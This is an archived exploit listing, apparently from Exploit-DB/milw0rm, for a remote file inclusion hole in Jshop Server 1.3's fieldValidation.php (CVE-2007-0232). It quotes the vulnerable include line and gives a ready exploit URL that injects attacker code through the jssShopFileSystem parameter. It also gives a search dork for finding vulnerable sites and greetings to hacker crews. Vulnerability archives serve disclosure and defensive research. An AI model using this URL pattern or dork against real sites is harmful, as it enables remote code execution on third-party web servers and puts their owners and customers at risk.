Jshop Server 1.3 - 'fieldValidation.php' Remote File Inclusion
Author: irvian
type: webapps
platform: php
port:
date_added: 2007-01-09
date_updated: 2016-11-16
verified: 1
codes: OSVDB-33459;CVE-2007-0232
tags:
aliases:
screenshot_url:
application_url:
==========================================================================
# scripts : Jshop Server 1.3
# Discovered By : irvian
# script : http://www.jshop.co.uk/
# Thanks To : #hitamputih #nyubicrew #patihack
# special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork :powered by jshop
--------------------------------------------------------------------------
file: routines/fieldValidation.php
include($jssShopFileSystem."resources/includes/validations.php");
exploit : www.target.com/routines/fieldValidation.php?jssShopFileSystem=[evilcode]
# milw0rm.com [2007-01-10]